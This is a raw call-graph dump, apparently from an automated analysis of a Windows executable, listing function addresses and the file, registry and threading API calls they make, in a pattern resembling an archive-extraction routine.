27349->27327 27350->27333 27351 7ff70e7af7c7 27350->27351 27351->27333 27352->26897 27353->26897 27354->26897 27355->26897 27357 7ff70e7aa862 27356->27357 27358 7ff70e7aa865 RegOpenKeyExW 27356->27358 27357->27358 27359 7ff70e7aa9c4 27358->27359 27362 7ff70e7aa889 27358->27362 27360 7ff70e7aa9e2 27359->27360 27361 7ff70e7820b0 33 API calls 27359->27361 27360->26897 27361->27360 27363 7ff70e7aa9b5 RegCloseKey 27362->27363 27364 7ff70e7813a4 33 API calls 27362->27364 27363->27359 27363->27360 27365 7ff70e7aa8f1 27364->27365 27366 7ff70e7aa976 27365->27366 27371 7ff70e7aa944 27365->27371 27433 7ff70e7a9744 33 API calls 2 library calls 27365->27433 27366->27363 27367 7ff70e7aa9b0 27366->27367 27369 7ff70e7aa9ff 27366->27369 27367->27363 27370 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27369->27370 27372 7ff70e7aaa04 27370->27372 27373 7ff70e7820b0 33 API calls 27371->27373 27373->27366 27374->26897 27375->26897 27376->26897 27378 7ff70e7972ea 27377->27378 27434 7ff70e78b3a8 27378->27434 27381->26897 27383 7ff70e7931e4 27382->27383 27384 7ff70e7931e7 DeleteFileW 27382->27384 27383->27384 27385 7ff70e7931fd 27384->27385 27392 7ff70e79327c 27384->27392 27386 7ff70e796a0c 49 API calls 27385->27386 27388 7ff70e793222 27386->27388 27387 7ff70e7b2320 _handle_error 8 API calls 27389 7ff70e793291 27387->27389 27390 7ff70e793226 DeleteFileW 27388->27390 27391 7ff70e793243 27388->27391 27389->26897 27390->27391 27391->27392 27393 7ff70e7932a1 27391->27393 27392->27387 27394 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27393->27394 27395 7ff70e7932a6 27394->27395 27397->26897 27398->26897 27399->26897 27400->26897 27402 7ff70e797e0c 27401->27402 27403 7ff70e797e23 27402->27403 27404 7ff70e797e55 27402->27404 27406 7ff70e78129c 33 API calls 27403->27406 27438 7ff70e78704c 47 API calls memcpy_s 27404->27438 27408 7ff70e797e47 27406->27408 27407 7ff70e797e5a 27408->26897 27409->26897 27410->26897 27413 7ff70e79d25e 27411->27413 27412 7ff70e79d292 27412->26898 27413->27412 27414 7ff70e781744 33 API calls 27413->27414 27414->27413 27415->26801 27416->26784 27418->26767 27419->26770 27420->26772 27421->26826 27422->26815 27424->26821 27426->27253 27427->27290 27428->27297 27429->27321 27430->27345 27431->27346 27432->27339 27433->27371 27436 7ff70e78b3f2 __scrt_get_show_window_mode 27434->27436 27435 7ff70e7b2320 _handle_error 8 API calls 27437 7ff70e78b4b6 27435->27437 27436->27435 27437->26897 27438->27407 27495 7ff70e7986ec 27439->27495 27441 7ff70e78e3c4 27501 7ff70e78e600 27441->27501 27443 7ff70e78e4d4 27445 7ff70e7b21d0 33 API calls 27443->27445 27444 7ff70e78e454 27444->27443 27446 7ff70e78e549 27444->27446 27447 7ff70e78e4f0 27445->27447 27448 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27446->27448 27507 7ff70e7a3148 102 API calls 27447->27507 27449 7ff70e78e54e 27448->27449 27454 7ff70e7918c2 27449->27454 27455 7ff70e781fa0 31 API calls 27449->27455 27457 7ff70e79190d 27449->27457 27451 7ff70e78e51d 27452 7ff70e7b2320 _handle_error 8 API calls 27451->27452 27453 7ff70e78e52d 27452->27453 27453->26916 27456 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27454->27456 27454->27457 27455->27449 27458 7ff70e79193b 27456->27458 27457->26916 27460 7ff70e78e7ea 27459->27460 27461 7ff70e78e864 27460->27461 27463 7ff70e78e8a1 27460->27463 27508 7ff70e793ec8 27460->27508 27461->27463 27464 7ff70e78e993 27461->27464 27471 7ff70e78e900 27463->27471 27515 7ff70e78f578 27463->27515 27465 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27464->27465 27469 7ff70e78e998 27465->27469 27466 7ff70e78e955 27468 7ff70e7b2320 _handle_error 8 API calls 27466->27468 27470 7ff70e78e97e 27468->27470 27473 7ff70e78e578 27470->27473 27471->27466 27551 7ff70e7828a4 82 API calls 2 library calls 27471->27551 28589 7ff70e7915d8 27473->28589 27476 7ff70e78e59e 27478 7ff70e781fa0 31 API calls 27476->27478 27477 7ff70e7a1870 108 API calls 27477->27476 27479 7ff70e78e5b7 27478->27479 27480 7ff70e781fa0 31 API calls 27479->27480 27481 7ff70e78e5c3 27480->27481 27482 7ff70e781fa0 31 API calls 27481->27482 27483 7ff70e78e5cf 27482->27483 27484 7ff70e79878c 108 API calls 27483->27484 27485 7ff70e78e5db 27484->27485 27486 7ff70e781fa0 31 API calls 27485->27486 27487 7ff70e78e5e4 27486->27487 27488 7ff70e781fa0 31 API calls 27487->27488 27490 7ff70e78e5ed 27488->27490 27489 7ff70e7918c2 27492 7ff70e79190d 27489->27492 27493 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27489->27493 27490->27489 27491 7ff70e781fa0 31 API calls 27490->27491 27490->27492 27491->27490 27492->26920 27494 7ff70e79193b 27493->27494 27496 7ff70e79870a 27495->27496 27497 7ff70e7b21d0 33 API calls 27496->27497 27498 7ff70e79872f 27497->27498 27499 7ff70e7b21d0 33 API calls 27498->27499 27500 7ff70e798759 27499->27500 27500->27441 27502 7ff70e78e627 27501->27502 27504 7ff70e78e62c memcpy_s 27501->27504 27503 7ff70e781fa0 31 API calls 27502->27503 27503->27504 27505 7ff70e781fa0 31 API calls 27504->27505 27506 7ff70e78e668 memcpy_s 27504->27506 27505->27506 27506->27444 27507->27451 27509 7ff70e7972cc 8 API calls 27508->27509 27510 7ff70e793ee1 27509->27510 27514 7ff70e793f0f 27510->27514 27552 7ff70e7940bc 27510->27552 27513 7ff70e793efa FindClose 27513->27514 27514->27460 27516 7ff70e78f598 _snwprintf 27515->27516 27591 7ff70e782950 27516->27591 27519 7ff70e78f5cc 27523 7ff70e78f5fc 27519->27523 27606 7ff70e7833e4 27519->27606 27522 7ff70e78f5f8 27522->27523 27638 7ff70e783ad8 27522->27638 27857 7ff70e782c54 27523->27857 27531 7ff70e788d04 33 API calls 27532 7ff70e78f662 27531->27532 27877 7ff70e797918 48 API calls 2 library calls 27532->27877 27534 7ff70e78f677 27535 7ff70e793ec8 55 API calls 27534->27535 27545 7ff70e78f6ad 27535->27545 27536 7ff70e78f842 27536->27523 27669 7ff70e7869f8 27536->27669 27680 7ff70e78f930 27536->27680 27542 7ff70e78f74d 27543 7ff70e78f7cb 27542->27543 27544 7ff70e78f89a 27542->27544 27547 7ff70e78f895 27542->27547 27648 7ff70e78f8a4 27543->27648 27546 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27544->27546 27545->27542 27545->27544 27548 7ff70e793ec8 55 API calls 27545->27548 27878 7ff70e797918 48 API calls 2 library calls 27545->27878 27549 7ff70e78f8a0 27546->27549 27550 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27547->27550 27548->27545 27550->27544 27551->27466 27553 7ff70e7941d2 FindNextFileW 27552->27553 27554 7ff70e7940f9 FindFirstFileW 27552->27554 27556 7ff70e7941e1 GetLastError 27553->27556 27557 7ff70e7941f3 27553->27557 27554->27557 27558 7ff70e79411e 27554->27558 27571 7ff70e7941c0 27556->27571 27559 7ff70e794211 27557->27559 27562 7ff70e7820b0 33 API calls 27557->27562 27560 7ff70e796a0c 49 API calls 27558->27560 27566 7ff70e78129c 33 API calls 27559->27566 27561 7ff70e794144 27560->27561 27564 7ff70e794148 FindFirstFileW 27561->27564 27567 7ff70e794167 27561->27567 27562->27559 27563 7ff70e7b2320 _handle_error 8 API calls 27565 7ff70e793ef4 27563->27565 27564->27567 27565->27513 27565->27514 27568 7ff70e79423b 27566->27568 27567->27557 27569 7ff70e7941af GetLastError 27567->27569 27573 7ff70e794314 27567->27573 27578 7ff70e798090 27568->27578 27569->27571 27571->27563 27574 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27573->27574 27575 7ff70e79431a 27574->27575 27576 7ff70e79430f 27577 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27576->27577 27577->27573 27579 7ff70e7980a5 27578->27579 27582 7ff70e798188 27579->27582 27581 7ff70e794249 27581->27571 27581->27576 27583 7ff70e798326 27582->27583 27586 7ff70e7981ba 27582->27586 27590 7ff70e78704c 47 API calls memcpy_s 27583->27590 27585 7ff70e79832b 27588 7ff70e7981d4 memcpy_s 27586->27588 27589 7ff70e7958a4 33 API calls 2 library calls 27586->27589 27588->27581 27589->27588 27590->27585 27592 7ff70e78296c 27591->27592 27593 7ff70e7986ec 33 API calls 27592->27593 27594 7ff70e78298d 27593->27594 27595 7ff70e7b21d0 33 API calls 27594->27595 27600 7ff70e782ac2 27594->27600 27597 7ff70e782ab0 27595->27597 27597->27600 27879 7ff70e7891c8 27597->27879 27886 7ff70e794d04 27600->27886 27601 7ff70e792ca8 27918 7ff70e7924c0 27601->27918 27603 7ff70e792cc5 27603->27519 27937 7ff70e7928d0 27606->27937 27607 7ff70e783674 27956 7ff70e7828a4 82 API calls 2 library calls 27607->27956 27608 7ff70e783431 __scrt_get_show_window_mode 27616 7ff70e78344e 27608->27616 27619 7ff70e783601 27608->27619 27942 7ff70e792bb0 27608->27942 27610 7ff70e7869f8 141 API calls 27612 7ff70e783682 27610->27612 27612->27610 27613 7ff70e78370c 27612->27613 27612->27619 27632 7ff70e792aa0 101 API calls 27612->27632 27618 7ff70e783740 27613->27618 27613->27619 27957 7ff70e7828a4 82 API calls 2 library calls 27613->27957 27615 7ff70e7835cb 27615->27616 27617 7ff70e7835d7 27615->27617 27616->27607 27616->27612 27617->27619 27621 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27617->27621 27618->27619 27620 7ff70e78384d 27618->27620 27634 7ff70e792bb0 101 API calls 27618->27634 27619->27522 27620->27619 27623 7ff70e7820b0 33 API calls 27620->27623 27624 7ff70e783891 27621->27624 27622 7ff70e7834eb 27622->27615 27951 7ff70e792aa0 27622->27951 27623->27619 27624->27522 27626 7ff70e7869f8 141 API calls 27627 7ff70e78378e 27626->27627 27627->27626 27628 7ff70e783803 27627->27628 27635 7ff70e792aa0 101 API calls 27627->27635 27630 7ff70e792aa0 101 API calls 27628->27630 27630->27620 27631 7ff70e7928d0 104 API calls 27631->27622 27632->27612 27633 7ff70e7928d0 104 API calls 27633->27615 27634->27627 27635->27627 27639 7ff70e783b55 27638->27639 27640 7ff70e783af9 27638->27640 27641 7ff70e7b2320 _handle_error 8 API calls 27639->27641 27969 7ff70e783378 27640->27969 27643 7ff70e783b67 27641->27643 27643->27531 27643->27543 27645 7ff70e783b6c 27646 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27645->27646 27647 7ff70e783b71 27646->27647 28201 7ff70e79886c 27648->28201 27650 7ff70e78f8ba 28205 7ff70e79ef60 GetSystemTime SystemTimeToFileTime 27650->28205 27653 7ff70e7a0994 27654 7ff70e7b0340 27653->27654 27655 7ff70e797df4 47 API calls 27654->27655 27656 7ff70e7b0373 27655->27656 27657 7ff70e79aae0 48 API calls 27656->27657 27658 7ff70e7b0387 27657->27658 27659 7ff70e79da98 48 API calls 27658->27659 27660 7ff70e7b0397 27659->27660 27661 7ff70e781fa0 31 API calls 27660->27661 27662 7ff70e7b03a2 27661->27662 28214 7ff70e7afc68 27662->28214 27670 7ff70e786a0e 27669->27670 27674 7ff70e786a0a 27669->27674 27679 7ff70e792bb0 101 API calls 27670->27679 27671 7ff70e786a1b 27672 7ff70e786a3e 27671->27672 27673 7ff70e786a2f 27671->27673 28309 7ff70e785130 139 API calls 2 library calls 27672->28309 27673->27674 28226 7ff70e785e24 27673->28226 27674->27536 27677 7ff70e786a3c 27677->27674 28310 7ff70e78466c 82 API calls 27677->28310 27679->27671 27681 7ff70e78f978 27680->27681 27687 7ff70e78f9b0 27681->27687 27741 7ff70e78fa34 27681->27741 28432 7ff70e7a612c 146 API calls 3 library calls 27681->28432 27682 7ff70e791189 27685 7ff70e7911e1 27682->27685 27686 7ff70e79118e 27682->27686 27684 7ff70e7b2320 _handle_error 8 API calls 27688 7ff70e7911c4 27684->27688 27685->27741 28481 7ff70e7a612c 146 API calls 3 library calls 27685->28481 27686->27741 28480 7ff70e78dd08 179 API calls 27686->28480 27687->27682 27690 7ff70e78f9d0 27687->27690 27687->27741 27688->27536 27690->27741 28347 7ff70e789bb0 27690->28347 27693 7ff70e78fad6 28360 7ff70e795ef8 27693->28360 27741->27684 27858 7ff70e782c74 27857->27858 27861 7ff70e782c88 27857->27861 27858->27861 28568 7ff70e782d80 108 API calls _invalid_parameter_noinfo_noreturn 27858->28568 27859 7ff70e781fa0 31 API calls 27863 7ff70e782ca1 27859->27863 27861->27859 27864 7ff70e782d64 27863->27864 28569 7ff70e783090 31 API calls _invalid_parameter_noinfo_noreturn 27863->28569 27866 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27864->27866 27865 7ff70e782d08 28570 7ff70e783090 31 API calls _invalid_parameter_noinfo_noreturn 27865->28570 27868 7ff70e782d7c 27866->27868 27869 7ff70e782d14 27870 7ff70e781fa0 31 API calls 27869->27870 27871 7ff70e782d20 27870->27871 28571 7ff70e79878c 27871->28571 27877->27534 27878->27545 27896 7ff70e7956a4 27879->27896 27881 7ff70e7891df 27899 7ff70e79b788 27881->27899 27885 7ff70e789383 27885->27600 27887 7ff70e794d32 __scrt_get_show_window_mode 27886->27887 27914 7ff70e794bac 27887->27914 27889 7ff70e794d54 27890 7ff70e794d90 27889->27890 27893 7ff70e794dae 27889->27893 27891 7ff70e7b2320 _handle_error 8 API calls 27890->27891 27892 7ff70e782b32 27891->27892 27892->27519 27892->27601 27894 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27893->27894 27895 7ff70e794db3 27894->27895 27905 7ff70e7956e8 27896->27905 27900 7ff70e7813a4 33 API calls 27899->27900 27901 7ff70e789365 27900->27901 27902 7ff70e789a28 27901->27902 27903 7ff70e7956e8 2 API calls 27902->27903 27904 7ff70e789a36 27903->27904 27904->27885 27906 7ff70e7956fe __scrt_get_show_window_mode 27905->27906 27909 7ff70e79eba4 27906->27909 27912 7ff70e79eb58 GetCurrentProcess GetProcessAffinityMask 27909->27912 27913 7ff70e7956de 27912->27913 27913->27881 27915 7ff70e794c27 27914->27915 27917 7ff70e794c2f memcpy_s 27914->27917 27916 7ff70e781fa0 31 API calls 27915->27916 27916->27917 27917->27889 27919 7ff70e7924fd CreateFileW 27918->27919 27921 7ff70e7925ae GetLastError 27919->27921 27928 7ff70e79266e 27919->27928 27922 7ff70e796a0c 49 API calls 27921->27922 27923 7ff70e7925dc 27922->27923 27924 7ff70e7925e0 CreateFileW GetLastError 27923->27924 27927 7ff70e79262c 27923->27927 27924->27927 27925 7ff70e7926b1 SetFileTime 27930 7ff70e7926cf 27925->27930 27926 7ff70e792708 27929 7ff70e7b2320 _handle_error 8 API calls 27926->27929 27927->27928 27933 7ff70e792736 27927->27933 27928->27925 27928->27930 27931 7ff70e79271b 27929->27931 27930->27926 27932 7ff70e7820b0 33 API calls 27930->27932 27931->27603 27936 7ff70e78b7e8 99 API calls 2 library calls 27931->27936 27932->27926 27934 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27933->27934 27935 7ff70e79273b 27934->27935 27936->27603 27938 7ff70e7928f6 27937->27938 27941 7ff70e7928fd 27937->27941 27938->27608 27939 7ff70e792320 GetStdHandle ReadFile GetLastError GetLastError GetFileType 27939->27941 27941->27938 27941->27939 27958 7ff70e78b8a4 99 API calls Concurrency::cancel_current_task 27941->27958 27943 7ff70e792be9 27942->27943 27944 7ff70e792bcd 27942->27944 27945 7ff70e7834cc 27943->27945 27947 7ff70e792c01 SetFilePointer 27943->27947 27944->27945 27959 7ff70e78b9c4 99 API calls Concurrency::cancel_current_task 27944->27959 27945->27631 27947->27945 27948 7ff70e792c1e GetLastError 27947->27948 27948->27945 27949 7ff70e792c28 27948->27949 27949->27945 27960 7ff70e78b9c4 99 API calls Concurrency::cancel_current_task 27949->27960 27961 7ff70e792778 27951->27961 27954 7ff70e7835a7 27954->27615 27954->27633 27956->27619 27957->27618 27967 7ff70e792789 _snwprintf 27961->27967 27962 7ff70e7927b5 27964 7ff70e7b2320 _handle_error 8 API calls 27962->27964 27963 7ff70e792890 SetFilePointer 27963->27962 27965 7ff70e7928b8 GetLastError 27963->27965 27966 7ff70e79281d 27964->27966 27965->27962 27966->27954 27968 7ff70e78b9c4 99 API calls Concurrency::cancel_current_task 27966->27968 27967->27962 27967->27963 27970 7ff70e783396 27969->27970 27971 7ff70e78339a 27969->27971 27970->27639 27970->27645 27975 7ff70e783294 27971->27975 27974 7ff70e792aa0 101 API calls 27974->27970 27976 7ff70e7832bb 27975->27976 27978 7ff70e7832f6 27975->27978 27977 7ff70e7869f8 141 API calls 27976->27977 27979 7ff70e7832db 27977->27979 27983 7ff70e786e74 27978->27983 27979->27974 27987 7ff70e786e95 27983->27987 27984 7ff70e7869f8 141 API calls 27984->27987 27985 7ff70e78331d 27985->27979 27988 7ff70e783904 27985->27988 27987->27984 27987->27985 28015 7ff70e79e808 27987->28015 28023 7ff70e786a7c 27988->28023 27991 7ff70e78396a 27994 7ff70e78399a 27991->27994 27995 7ff70e783989 27991->27995 27992 7ff70e783a8a 27996 7ff70e7b2320 _handle_error 8 API calls 27992->27996 27999 7ff70e7839ec 27994->27999 28000 7ff70e7839a3 27994->28000 28056 7ff70e7a0d54 33 API calls 27995->28056 27998 7ff70e783a9e 27996->27998 27998->27979 28058 7ff70e7826b4 33 API calls memcpy_s 27999->28058 28057 7ff70e7a0c80 33 API calls 28000->28057 28001 7ff70e783ab3 28002 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 28001->28002 28004 7ff70e783ab8 28002->28004 28009 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 28004->28009 28005 7ff70e7839b0 28007 7ff70e7839c0 memcpy_s 28005->28007 28010 7ff70e781fa0 31 API calls 28005->28010 28011 7ff70e781fa0 31 API calls 28007->28011 28008 7ff70e783a13 28059 7ff70e7a0ae8 34 API calls _invalid_parameter_noinfo_noreturn 28008->28059 28013 7ff70e783abe 28009->28013 28010->28007 28014 7ff70e78394f 28011->28014 28014->27992 28014->28001 28014->28004 28016 7ff70e79e811 28015->28016 28017 7ff70e79e82b 28016->28017 28021 7ff70e78b664 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 28016->28021 28019 7ff70e79e845 SetThreadExecutionState 28017->28019 28022 7ff70e78b664 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 28017->28022 28021->28017 28022->28019 28024 7ff70e786a96 _snwprintf 28023->28024 28025 7ff70e786ac4 28024->28025 28028 7ff70e786ae4 28024->28028 28098 7ff70e7828a4 82 API calls 2 library calls 28025->28098 28027 7ff70e786d4d 28127 7ff70e7828a4 82 API calls 2 library calls 28027->28127 28028->28027 28031 7ff70e786b0f 28028->28031 28030 7ff70e786ad0 28032 7ff70e7b2320 _handle_error 8 API calls 28030->28032 28031->28030 28060 7ff70e7a1f94 28031->28060 28033 7ff70e78394b 28032->28033 28033->27991 28033->28014 28055 7ff70e782794 33 API calls __std_swap_ranges_trivially_swappable 28033->28055 28036 7ff70e786b85 28039 7ff70e786c2a 28036->28039 28054 7ff70e786b7b 28036->28054 28104 7ff70e798968 109 API calls 28036->28104 28037 7ff70e786b6e 28099 7ff70e7828a4 82 API calls 2 library calls 28037->28099 28038 7ff70e786b80 28038->28036 28100 7ff70e7840b0 28038->28100 28069 7ff70e794760 28039->28069 28045 7ff70e786c52 28046 7ff70e786cc7 28045->28046 28047 7ff70e786cd1 28045->28047 28073 7ff70e791794 28046->28073 28105 7ff70e7a1f20 28047->28105 28088 7ff70e7a1870 28054->28088 28055->27991 28056->28014 28057->28005 28058->28008 28059->28014 28061 7ff70e7a2056 std::bad_alloc::bad_alloc 28060->28061 28064 7ff70e7a1fc5 std::bad_alloc::bad_alloc 28060->28064 28128 7ff70e7b4078 28061->28128 28062 7ff70e786b59 28062->28036 28062->28037 28062->28038 28064->28062 28065 7ff70e7b4078 Concurrency::cancel_current_task 2 API calls 28064->28065 28066 7ff70e7a200f std::bad_alloc::bad_alloc 28064->28066 28065->28066 28066->28062 28067 7ff70e7b4078 Concurrency::cancel_current_task 2 API calls 28066->28067 28068 7ff70e7a20a9 28067->28068 28070 7ff70e794780 28069->28070 28072 7ff70e79478a 28069->28072 28071 7ff70e7b21d0 33 API calls 28070->28071 28071->28072 28072->28045 28074 7ff70e7917be __scrt_get_show_window_mode 28073->28074 28133 7ff70e798a48 28074->28133 28089 7ff70e7a188e 28088->28089 28091 7ff70e7a18a1 28089->28091 28158 7ff70e79e948 28089->28158 28095 7ff70e7a18d8 28091->28095 28149 7ff70e7b236c 28091->28149 28093 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 28094 7ff70e7a1ad0 28093->28094 28097 7ff70e7a1a37 28095->28097 28153 7ff70e79a984 28095->28153 28097->28093 28098->28030 28099->28054 28101 7ff70e7840dd 28100->28101 28103 7ff70e7840d7 __scrt_get_show_window_mode 28100->28103 28101->28103 28165 7ff70e784120 28101->28165 28103->28036 28104->28039 28106 7ff70e7a1f29 28105->28106 28107 7ff70e7a1f5d 28106->28107 28108 7ff70e7a1f55 28106->28108 28109 7ff70e7a1f49 28106->28109 28127->28030 28129 7ff70e7b40b4 RtlPcToFileHeader 28128->28129 28130 7ff70e7b4097 28128->28130 28131 7ff70e7b40db RaiseException 28129->28131 28132 7ff70e7b40cc 28129->28132 28130->28129 28131->28064 28132->28131 28150 7ff70e7b239f 28149->28150 28151 7ff70e7b23c8 28150->28151 28152 7ff70e7a1870 108 API calls 28150->28152 28151->28095 28152->28150 28154 7ff70e79a995 28153->28154 28155 7ff70e79a9dd 28153->28155 28154->28155 28156 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 28154->28156 28155->28097 28159 7ff70e79ecd8 103 API calls 28158->28159 28160 7ff70e79e95f ReleaseSemaphore 28159->28160 28161 7ff70e79e984 28160->28161 28162 7ff70e79e9a3 DeleteCriticalSection CloseHandle CloseHandle 28160->28162 28163 7ff70e79ea5c 101 API calls 28161->28163 28168 7ff70e784149 28165->28168 28170 7ff70e784168 __std_swap_ranges_trivially_swappable __scrt_get_show_window_mode 28165->28170 28166 7ff70e782018 33 API calls 28167 7ff70e7841eb 28166->28167 28169 7ff70e7b21d0 33 API calls 28168->28169 28168->28170 28169->28170 28170->28166 28202 7ff70e798882 28201->28202 28203 7ff70e798892 28201->28203 28208 7ff70e7923f0 28202->28208 28203->27650 28206 7ff70e7b2320 _handle_error 8 API calls 28205->28206 28207 7ff70e78f7dc 28206->28207 28207->27536 28207->27653 28209 7ff70e79240f 28208->28209 28212 7ff70e792aa0 101 API calls 28209->28212 28210 7ff70e792428 28213 7ff70e792bb0 101 API calls 28210->28213 28211 7ff70e792438 28211->28203 28212->28210 28213->28211 28215 7ff70e7afc94 28214->28215 28216 7ff70e78129c 33 API calls 28215->28216 28217 7ff70e7afca4 28216->28217 28227 7ff70e785e67 28226->28227 28229 7ff70e785ea5 28227->28229 28233 7ff70e785eb7 28227->28233 28257 7ff70e786084 28227->28257 28321 7ff70e7828a4 82 API calls 2 library calls 28229->28321 28231 7ff70e786134 28328 7ff70e786fcc 82 API calls 28231->28328 28233->28231 28234 7ff70e785f44 28233->28234 28322 7ff70e786f38 33 API calls memcpy_s 28233->28322 28323 7ff70e786d88 82 API calls 28234->28323 28235 7ff70e7869af 28237 7ff70e7b2320 _handle_error 8 API calls 28235->28237 28238 7ff70e7869c3 28237->28238 28238->27677 28240 7ff70e7869e4 28242 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 28240->28242 28241 7ff70e786973 28305 7ff70e785eb2 28241->28305 28244 7ff70e7869e9 28242->28244 28243 7ff70e78612e 28243->28231 28243->28241 28249 7ff70e7985f0 104 API calls 28243->28249 28248 7ff70e786034 28252 7ff70e7b236c 108 API calls 28248->28252 28248->28257 28250 7ff70e7869ef 28253 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 28250->28253 28256 7ff70e7869f5 28253->28256 28311 7ff70e7985f0 28257->28311 28258 7ff70e786097 28327 7ff70e78433c 82 API calls 2 library calls 28258->28327 28262 7ff70e785f5d 28262->28248 28262->28258 28324 7ff70e78433c 82 API calls 2 library calls 28262->28324 28325 7ff70e786d88 82 API calls 28262->28325 28326 7ff70e78a1a0 109 API calls _handle_error 28262->28326 28305->28235 28305->28240 28305->28250 28309->27677 28312 7ff70e79869a 28311->28312 28314 7ff70e798614 28311->28314 28313 7ff70e79867c 28312->28313 28315 7ff70e7840b0 33 API calls 28312->28315 28313->28243 28314->28313 28316 7ff70e7840b0 33 API calls 28314->28316 28318 7ff70e7986b3 28315->28318 28317 7ff70e79864d 28316->28317 28342 7ff70e78a174 28317->28342 28320 7ff70e7928d0 104 API calls 28318->28320 28320->28313 28321->28305 28323->28262 28324->28262 28325->28262 28326->28262 28328->28305 28355 7ff70e789be7 28347->28355 28348 7ff70e789c1b 28349 7ff70e7b2320 _handle_error 8 API calls 28348->28349 28350 7ff70e789c9d 28349->28350 28350->27693 28352 7ff70e789c83 28354 7ff70e781fa0 31 API calls 28352->28354 28354->28348 28355->28348 28355->28352 28356 7ff70e789cae 28355->28356 28482 7ff70e795294 28355->28482 28500 7ff70e79db60 28355->28500 28357 7ff70e789cbf 28356->28357 28504 7ff70e79da48 CompareStringW 28356->28504 28357->28352 28359 7ff70e7820b0 33 API calls 28357->28359 28359->28352 28373 7ff70e795f3a 28360->28373 28361 7ff70e79619b 28365 7ff70e78129c 33 API calls 28372 7ff70e7961ce 28373->28361 28373->28365 28373->28372 28432->27687 28480->27741 28481->27741 28483 7ff70e7952d4 28482->28483 28487 7ff70e795312 __vcrt_FlsAlloc 28483->28487 28495 7ff70e795339 __vcrt_FlsAlloc 28483->28495 28505 7ff70e7a13f4 CompareStringW 28483->28505 28484 7ff70e7b2320 _handle_error 8 API calls 28485 7ff70e795503 28484->28485 28485->28355 28489 7ff70e795382 __vcrt_FlsAlloc 28487->28489 28487->28495 28506 7ff70e7a13f4 CompareStringW 28487->28506 28490 7ff70e795439 28489->28490 28491 7ff70e78129c 33 API calls 28489->28491 28489->28495 28494 7ff70e79551b 28490->28494 28496 7ff70e795489 28490->28496 28492 7ff70e795426 28491->28492 28493 7ff70e7972cc 8 API calls 28492->28493 28493->28490 28498 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 28494->28498 28495->28484 28496->28495 28507 7ff70e7a13f4 CompareStringW 28496->28507 28502 7ff70e79db73 28500->28502 28501 7ff70e79db91 28501->28355 28502->28501 28503 7ff70e7820b0 33 API calls 28502->28503 28503->28501 28504->28357 28505->28487 28506->28489 28507->28495 28568->27861 28569->27865 28570->27869 28572 7ff70e7987af 28571->28572 28573 7ff70e7987df 28571->28573 28574 7ff70e7b236c 108 API calls 28572->28574 28575 7ff70e7b236c 108 API calls 28573->28575 28583 7ff70e79882b 28573->28583 28577 7ff70e7987ca 28574->28577 28578 7ff70e798814 28575->28578 28580 7ff70e7b236c 108 API calls 28577->28580 28581 7ff70e7b236c 108 API calls 28578->28581 28579 7ff70e798845 28582 7ff70e79461c 108 API calls 28579->28582 28580->28573 28581->28583 28584 7ff70e798851 28582->28584 28585 7ff70e79461c 28583->28585 28586 7ff70e794632 28585->28586 28588 7ff70e79463a 28585->28588 28587 7ff70e79e948 108 API calls 28586->28587 28587->28588 28588->28579 28590 7ff70e79163e 28589->28590 28594 7ff70e791681 28589->28594 28593 7ff70e7931bc 51 API calls 28590->28593 28590->28594 28591 7ff70e7916a0 28592 7ff70e78e600 31 API calls 28591->28592 28597 7ff70e7916de 28592->28597 28593->28590 28594->28591 28595 7ff70e781fa0 31 API calls 28594->28595 28595->28594 28596 7ff70e79178d 28599 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 28596->28599 28597->28596 28600 7ff70e79175b 28597->28600 28598 7ff70e7b2320 _handle_error 8 API calls 28601 7ff70e78e58a 28598->28601 28602 7ff70e791792 28599->28602 28600->28598 28601->27476 28601->27477 28604 7ff70e7a84cc 4 API calls 28603->28604 28605 7ff70e7a84aa 28604->28605 28606 7ff70e7a84b9 28605->28606 28615 7ff70e7a8504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28605->28615 28606->26927 28606->26928 28608->26933 28609->26939 28611 7ff70e7a84de 28610->28611 28613 7ff70e7a84e3 28610->28613 28616 7ff70e7a8590 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28611->28616 28613->26939 28614->26942 28615->28606 28616->28613 28617->26966 28619->26988 28620->27004 28621 7ff70e7b20f0 28622 7ff70e7b2106 _com_error::_com_error 28621->28622 28623 7ff70e7b4078 Concurrency::cancel_current_task 2 API calls 28622->28623 28624 7ff70e7b2117 28623->28624 28625 7ff70e7b1900 _com_raise_error 14 API calls 28624->28625 28626 7ff70e7b2163 28625->28626 28627 7ff70e7b1278 28628 7ff70e7b1900 _com_raise_error 14 API calls 28627->28628 28629 7ff70e7b12b7 28628->28629 28630 7ff70e7bbf2c 28637 7ff70e7bbc34 28630->28637 28642 7ff70e7bd440 35 API calls 3 library calls 28637->28642 28639 7ff70e7bbc3f 28643 7ff70e7bd068 35 API calls abort 28639->28643 28642->28639 28644 7ff70e7b154b 28645 7ff70e7b14a2 28644->28645 28646 7ff70e7b1900 _com_raise_error 14 API calls 28645->28646 28646->28645 28647 7ff70e7bd94c 28648 7ff70e7bd997 28647->28648 